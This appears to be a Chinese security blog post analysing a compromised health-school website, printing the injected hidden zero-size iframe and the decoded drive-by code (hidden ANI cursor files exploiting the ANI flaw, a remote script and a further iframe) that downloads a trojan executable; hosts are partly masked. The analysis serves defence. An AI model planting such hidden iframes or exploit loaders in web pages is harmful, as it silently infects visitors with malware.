某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码

简介: 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码

植入的代码为:

/---
<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0>
---/

kehu0739.htm的内容所用代码为US-ASCII。

到  http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 解密后得到的内容包含代码:

/---
<DIV id=new_content_jp style="DISPLAY: none">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39a.jpg')">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39b.jpg')"></DIV></DIV></DIV>
<SCRIPT language=javascript src="hxxp://www.1**8d*m***m.com/wangma/39.js"></SCRIPT>
<iframe src=hxxp://www.1**8d*m***m.com/wangma/061439.htm width=0 height=0></iframe>
---/

hxxp://www.1**8d*m***m.com/wangma/39a.jpg(Kaspersky 报为 Exploit.Win32.ImG-ANI.ac)和 39b.jpg 利用 ANI漏洞 下载Hxxp://1**8d*m***m.com/xi*a***/kehu0739.exe


相关文章
|
7天前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
7天前
|
JavaScript 前端开发
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
|
7天前
|
监控 安全 数据安全/隐私保护
一个会下载至少3个Viking等恶意程序的网站
一个会下载至少3个Viking等恶意程序的网站
|
7天前
|
安全 JavaScript 前端开发
某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
|
7天前
|
安全 数据安全/隐私保护
某论坛挂马Worm.Win32.Autorun.eyh
某论坛挂马Worm.Win32.Autorun.eyh
|
7天前
|
JavaScript 前端开发 数据安全/隐私保护
QQ信息中传播Worm.Viking.es的这个网页真复杂
QQ信息中传播Worm.Viking.es的这个网页真复杂
|
7天前
|
安全
某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
|
7天前
|
安全 JavaScript 前端开发
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
|
7天前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
|
7天前
|
安全
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码